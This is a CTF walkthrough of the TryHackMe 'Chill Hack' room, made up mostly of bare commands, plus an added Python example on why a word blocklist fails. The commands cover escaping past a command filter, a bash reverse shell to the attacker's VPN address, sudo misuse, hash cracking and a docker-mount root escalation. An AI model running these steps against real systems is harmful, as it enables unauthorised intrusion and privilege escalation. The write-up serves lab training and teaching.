Chill Hack — TryHackMe — WriteUp

nmap -A -T4 -p- -v <ip>

nmap

ftp <ip>

FTP

1/ Two names: Anurodh and Apaar

2/ Input filtering of “command”

website

gobuster dir -u http://<ip>/ -w /path-to-wordlist

gobuster
/secret
ls -al
pwd
l\s -al

c\a\t index.php

c\at index.php
index.php
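Why `l\s` and `c\at` pass a word blocklist yet still run as `ls` and `cat`: the filter compares the raw string, and the shell strips the backslash afterwards. This is an added example, not code from the write-up or from the room's index.php; the blocklist and allowlist contents and all function names are assumptions.

```python
import shlex

# Assumed blocklist; the room's real list is not reproduced on this page.
BLOCKED = {"ls", "cat", "nc", "python", "bash", "php", "perl", "rm", "less", "more"}
# Hypothetical allowlist used by the hardened check.
ALLOWED = {"pwd", "whoami", "id", "date"}

def naive_filter(command: str) -> bool:
    """Blocklist on raw whitespace-split words. True means 'accepted'."""
    return not any(word in BLOCKED for word in command.split())

def shell_view(command: str) -> list[str]:
    """Tokenise as a POSIX shell does, removing quotes and backslash escapes."""
    return shlex.split(command, posix=True)

def strict_filter(command: str) -> bool:
    """Allowlist on the normalised program name; reject shell metacharacters."""
    if any(ch in command for ch in ";|&`$<>\\'\"\n(){}"):
        return False
    try:
        argv = shell_view(command)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED

# Constructed samples, taken from the commands typed in this write-up.
SAMPLES = ["ls -al", r"l\s -al", r"c\at index.php", "pwd"]

def report():
    """For each sample: (command, naive verdict, program the shell runs, strict verdict)."""
    return [(c, naive_filter(c), shell_view(c)[0], strict_filter(c)) for c in SAMPLES]

if __name__ == "__main__":
    for cmd, naive, prog, strict in report():
        print(f"{cmd!r:20} naive_accepts={naive!s:5} shell_runs={prog:4} strict_accepts={strict}")
```

Passing the validated argv list to the process API without a shell removes the second parsing step altogether.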

nc -lvnp 4444

/bin/bash -c '/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1'

reverse shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l

sudo -u apaar /home/apaar/.helpline.sh

script content
apaar shell
local.txt
sudo -l
/var/www
files
hacker.php
index.php

mysql -u root -p

mysql login
images

steghide extract -sf hack….jpg

steghide

zip2john backup.zip > backupjohn.txt

john --wordlist=rockyou.txt backupjohn.txt

john
source_code.php

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

root shell
root flag

HAPPY HACKING
